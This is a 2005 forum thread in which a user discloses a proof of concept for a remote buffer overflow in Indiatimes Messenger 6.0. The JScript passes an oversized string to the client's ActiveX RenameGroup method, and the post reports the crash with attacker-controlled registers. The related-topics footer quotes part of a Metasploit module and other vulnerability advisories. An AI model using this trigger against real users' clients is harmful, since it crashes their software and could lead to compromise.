sunny
Sep 1 2005, 03:55 PM
CODE [CODE]Indiatimes Messenger 6.0 Buffer Overflow (Remote)
Vulnerable Program : Indiatimes Messenger v6.0
(Latest)
Vendor URL : http://messenger.indiatimes.com/
Exploit Type : Remote DoS (Remote Compromise may also
be possible)
Proof Of Concept:
[script]
var obj1 = new
ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";
for(i=0; i<1000; i++)
{
buf += "A";
}
while(obj1.GetServerStatus() != "Logged In"); //wait
till login
obj1.RenameGroup("Friends", buf, 5);
[/script]
The program (MMClient.exe) crashes @
004B681B 8979 04 mov dword ptr
ds:[ecx+4],edi
with registers ecx, and edi = 0x41414141
[controllable]
So, remote compromise maybe possible (not confirmed).
Reply
Saint_Michael
Sep 1 2005, 04:10 PM
you should explain the reason for this code, it doesn't do one any good if you just slap a code and not explain it.
Reply
sunny
Sep 1 2005, 04:37 PM
Explanation: Indiatimes Messenger is a communication client application just like Yahoo! messenger. the indiatimes messenger is used by site: http://www.indiatimes.com as usual. Indiatimes.com also has some issues with their web site. like in registration process. but that is a different story. Anyways, Indiatimes Messenger shows some problematic behaviour on certain conditions. Which may lead to buffer overfloaw and thus also result in Remote compromise.
Reply
Saint_Michael
Sep 2 2005, 09:44 AM
and so this code should help out those who use this program then? not bad.
Reply
Recent Queries:--
inditimes messenger 6 - 399.09 hr back. (1)
-
port indiatimes messenger - 997.96 hr back. (1)
Similar Topics
Keywords : indiatimes, messenger, 6, 0, buffer, overflow, indiatimes, messenger, 6, 0, buffer, overflow
- Virus Thru Msn Messenger
Instant message supposedly thru my daughter... (6)
Hole In Microsoft Messenger Program Requires A Immediate Update
For Users of MSN Messenger 6.2, 7.0 and 7.5 versions of MSN Messenger (0) SOURCE Well it seems that Microsoft found a huge hole in MSN Messenger that was bad enough that
they want people to upgrade to the current Messenger which is Live 8.1 or something like that. As
for details on the problem they just said the following, "..which let hackers embed malicious code
in Web chat invitations to users." and that they found this problem in "6.2, 7.0 and 7.5, as well as
Windows Live Messenger 8.0." Although it was interesting to know that people were actually
complaining about Live Messenger being a resource hog, well the last time I check msn w....
New Messenger Virus & Hoaxes!
(4) well it's starting to look like this virus is going around almost all the common messengers.
(ICQ, Yahoo, MSN, AIM, the works) It says: "Hey can you rate my picture?" with a link to a blank
site. Well dont click. It's blank because the virus is on it. Believe me. I had it. and it
kills your comp.....
Novell Edirectory Imonitor Remote Buffer Overflow
running on port 8008 (4) Here's the advisory: http://www.frsirt.com/english/advisories/2005/1403 package
Msf::Exploit::edirectory_imonitor; use strict; use base "Msf::Exploit"; use Pex::Text; my
$advanced = { }; my $info = { 'Name' => 'eDirectory 8.7.3 iMonitor Remote
Stack Overflow', 'Version' => '$Revision: 1.1 $', 'Authors' =>
, 'Arch' => , 'OS' => , 'Priv' => 1, 'AutoOpts' => {
'EXITFUNC' => 'thread' }, 'UserOpts' => { 'RHOST' => ,
'RPORT' => , ....
Remote Buffer Overflow Vulnerability In Yahoopops
(2) Hat-Squad Advisory: Remote Buffer overflow Vulnerability in YahooPOPS September 22, 2004 Product:
YahooPOPS! Vendor URL: http://yahoopops.sourceforge.net Version: YahooPOPS v0.4 up to v0.6
Vulnerability: Remote Buffer overflows Release Date: 27 September 2004 Vendor Status: Informed on
24 September 2004 Response: no response Description: YahooPOPs! Is an application that provides
POP3 access to Yahoo! Mail. It is available on the Windows, Linux, Solaris and Mac platforms.
This application emulates a POP3 & SMTP server. It also enables popular email clie....
Warning: Virus Spreading Through Msn Messenger
any info? (12) I was online, and then a friend sent me that file, and I accepted it because he's been wanting
to send me a program that improves the resolution of the screen. But then my email address was in
the file name, so I asked him what that was. To my horror, he said 'virus', but it was too
late, I already opened it and then several chat screens popped-up, and it was auto-sent to some of
the friends on the contact list. Luckily i was quick enough to ask them not to click on it. And my
norton internet security and microsoft anti spyware program detected it and asked ....
Yahoo! Messenger vulnerability
(1) Secunia Research has discovered a vulnerability in Yahoo! Messenger, which can be exploited by
malicious, local users to gain escalated privileges.
The vulnerability is caused due to a
combination of weak default directory permissions and the Audio Setup Wizard (asw.dll) invoking the
"ping.exe" utility insecurely during the connection testing phase. This can be exploited to execute
arbitrary code with the privileges of another user by placing a malicious "ping.exe" file in the
application's "Messenger" directory.
Successful exploitation requires that a user runs th....
Msn Messenger Virus
awful (60) Okay there’s a new virus going around MSN, I thought only my dumb friends were the ones accepting
it, but turns out its across the nation. So I dont know if you've got it and deleted it, or was
smart and didn’t accept it. Well it goes by (as far as I know) three names. There like "Frog
something something blender" "My new photo!" and like "Me and my lesbian friends!". Its a
17kb file, so if some1 in your list tries to send you one the those, DONT ACCEPT! It goes into
your list(takes total control, so you cant do anything) and sends itself to EVERY1 in you....
Virus Alert - Messenger Viruses
New viruses spreading through Y! Msngr (7) QUOTE If somebody by the name of json73002@yahoo.com adds you. dont accept it. Its a virus. Tell
everyone on ur bulletin because if somebody on ur list adds them, u get the virus too. Tell everyone
on your list not to open anything angell11. tewwtuler and sassy*BLEEP*. It is a hard drive killer
and a very horrible virus. Pass this letter to everyone on your buddy list. We need to find out who
is really using these accounts. Sorry for the inconvenience. Becareful while using Messengers
guys! Don't keep your messengers online unnecessarily. Go offline as so....
Looking for indiatimes, messenger, 6, 0, buffer, overflow, indiatimes, messenger, 6, 0, buffer, overflow
|
*RANDOM STUFF*
*SIMILAR VIDEOS*
Searching Video's for indiatimes, messenger, 6, 0, buffer, overflow, indiatimes, messenger, 6, 0, buffer, overflow
*MORE FROM TRAP17.COM*
|
advertisement
|
|
